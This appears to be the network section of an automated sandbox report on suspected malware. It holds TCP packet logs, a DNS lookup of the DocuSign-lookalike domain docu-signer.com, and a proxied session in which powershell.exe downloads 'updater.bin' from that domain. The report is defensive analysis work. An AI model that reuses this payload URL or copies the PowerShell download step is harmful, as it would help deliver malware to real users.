                                Dec 17, 2024 08:24:43.119292974 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.119308949 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.154712915 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.154779911 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.154820919 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.154850960 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.154884100 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.154906034 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.162590027 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.162616968 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.162702084 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.162733078 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.162751913 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.162780046 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.170444965 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.170469999 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.170557022 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.170567989 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.170608997 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.177433968 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.177449942 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.177512884 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.177525043 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.177536011 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.177568913 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.185606003 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.185621977 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.185724020 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.185735941 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.185779095 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.191864014 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.191937923 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.191941977 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.191951990 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.191982031 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.199543953 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.199588060 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.199605942 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.199616909 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.199649096 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.199661970 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.304384947 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.310853004 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.310883045 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.310930014 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.310960054 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.310981035 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.311006069 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.323518038 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.346159935 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.346190929 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.346256971 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.346292019 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.346307993 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.346333027 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.348828077 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.348897934 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.348910093 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.356791973 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.356820107 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.356882095 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.356905937 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.356931925 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.365081072 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.365096092 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.365148067 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.365178108 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.365191936 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.369256973 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.369318962 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.369338036 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.369383097 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.376368999 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.376388073 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.376466990 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.376488924 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.376528025 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.385073900 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.385091066 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.385139942 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.385165930 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.385179996 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.385204077 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.391964912 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.391983032 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.392060995 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.392096043 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.392134905 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.491679907 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.503249884 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.503257990 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.503403902 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.503447056 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.503493071 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.506670952 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.506733894 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.510323048 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.541887045 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.541893959 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.542007923 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.542031050 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.549725056 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.549745083 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.549815893 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.549848080 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.549863100 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.557745934 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.557760000 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.557818890 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.557842970 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.557856083 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.564714909 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.564733982 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.564801931 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.564825058 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.564838886 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.572607994 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.572621107 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.572776079 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.572808027 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.580207109 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.580229998 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.580291986 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.580307007 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.580316067 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.588099957 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.588114977 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.588160038 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.588181973 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.588193893 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.636200905 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.695434093 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.695508003 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.695552111 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.697071075 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.725701094 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.731275082 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.731296062 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.731343031 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.731372118 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.731406927 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.738677025 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.738698006 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.738738060 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.738748074 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.738779068 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.746963024 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.746980906 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.747049093 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.747068882 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.747095108 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.753731012 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.753753901 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.753810883 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.753844023 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.753860950 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.761730909 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.761746883 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.761809111 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.761823893 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.769133091 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.769153118 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.769192934 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.769203901 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.769232035 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.777045965 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.777060986 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.777117968 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.777129889 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.782916069 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.782979965 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.782994986 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.783066034 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.893991947 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.894012928 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.894062996 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.894087076 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.894114971 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.894135952 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.930147886 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.930164099 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.930234909 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.930246115 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.930275917 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.930299044 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.938133955 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.938149929 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.938230991 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.938240051 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.938302040 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.938474894 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.945316076 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.945333004 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.945401907 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.945410013 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.945457935 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.953033924 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.953049898 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.953136921 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.953145027 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.953196049 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.960576057 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.960591078 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.960649014 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.960705042 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.960717916 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.960774899 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.968491077 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.968508005 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.968611002 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.968620062 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.968663931 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.976519108 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.976535082 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.976632118 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:43.976643085 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:43.976685047 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:44.080244064 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:44.108932018 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:44.116147041 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:44.116362095 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:44.116394043 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:44.116451979 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:44.116461039 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:44.116497040 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:44.122665882 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:44.122693062 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:44.122740984 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:44.122746944 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:44.122781038 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:44.130554914 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:44.130574942 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:44.130623102 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:44.130631924 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:44.130662918 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:44.137449026 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:44.137522936 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:44.137531042 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:44.137588978 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:44.140988111 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:44.141051054 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:44.141057014 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:44.141098976 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:44.144313097 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:44.144361019 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:44.151839972 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:44.151860952 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:44.151906967 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:44.151917934 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:44.151937962 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:44.151952028 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:44.159816980 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:44.159837961 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:44.159893036 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:44.159900904 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:44.159935951 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:44.159951925 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:44.166785002 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:44.166805983 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:44.166857958 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:44.166867018 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:44.166882038 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:44.170264006 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:44.178813934 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:44.195210934 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:44.296813965 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:44.296839952 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:44.296938896 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:44.296938896 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:44.296956062 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:44.300263882 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:44.300280094 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:44.305809021 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:44.353033066 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:44.353059053 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:44.353116035 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:44.353127003 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:44.353151083 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:44.353169918 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:44.360333920 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:44.360357046 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:44.360425949 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:44.360434055 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:44.360930920 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:44.367882013 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:44.367904902 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:44.367954016 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:44.367960930 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:44.367988110 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:44.368002892 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:44.375278950 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:44.375298977 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:44.375343084 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:44.375350952 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:44.375382900 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:44.375396013 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:44.382879972 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:44.382899046 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:44.382944107 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:44.382951021 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:44.382973909 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:44.384442091 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:44.390712023 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:44.390733957 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:44.390803099 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:44.390810013 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:44.391228914 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:44.393016100 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:44.393062115 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:44.393068075 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:44.393102884 CET44349700104.21.87.65192.168.2.7
                                Dec 17, 2024 08:24:44.393131018 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:44.393153906 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:44.395736933 CET49700443192.168.2.7104.21.87.65
                                Dec 17, 2024 08:24:44.462346077 CET49700443192.168.2.7104.21.87.65

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Dec 17, 2024 08:24:34.961544037 CET5541853192.168.2.71.1.1.1
                                Dec 17, 2024 08:24:35.106278896 CET53554181.1.1.1192.168.2.7

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Dec 17, 2024 08:24:34.961544037 CET192.168.2.71.1.1.10x7d9bStandard query (0)docu-signer.comA (IP address)IN (0x0001)false

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Dec 17, 2024 08:24:35.106278896 CET1.1.1.1192.168.2.70x7d9bNo error (0)docu-signer.com104.21.87.65A (IP address)IN (0x0001)false
                                Dec 17, 2024 08:24:35.106278896 CET1.1.1.1192.168.2.70x7d9bNo error (0)docu-signer.com172.67.142.2A (IP address)IN (0x0001)false

                                HTTP Request Dependency Graph

                                • docu-signer.com

                                HTTPS Proxied Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.749699104.21.87.654434548C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                TimestampBytes transferredDirectionData
                                2024-12-17 07:24:36 UTC189OUTGET /api/uz/0912545164/updater.bin HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                Host: docu-signer.com
                                Connection: Keep-Alive
                                2024-12-17 07:24:37 UTC879INHTTP/1.1 200 OK
                                Date: Tue, 17 Dec 2024 07:24:36 GMT
                                Content-Type: application/octet-stream
                                Content-Length: 893608
                                Connection: close
                                Last-Modified: Sun, 13 Oct 2024 09:57:05 GMT
                                ETag: "670b9971-da2a8"
                                Accept-Ranges: bytes
                                cf-cache-status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ftRxqo0%2B5rpFNvKFxYSdacM8pejS1AAme4vFoHO1dXzZV5cimQpbnzUThFXeSENpKw3DsR5C8mGNB1XPiBfhgocZur%2F5TTiP%2Fk7MJENB%2BxNoaQVRlTijBCWE%2BYiPGLgXZew%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 8f352ca8ede21889-EWR
                                alt-svc: h3=":443"; ma=86400
                                server-timing: cfL4;desc="?proto=TCP&rtt=1603&min_rtt=1519&rtt_var=629&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=803&delivery_rate=1922317&cwnd=252&unsent_bytes=0&cid=919c7d4caf657f83&ts=672&x=0"
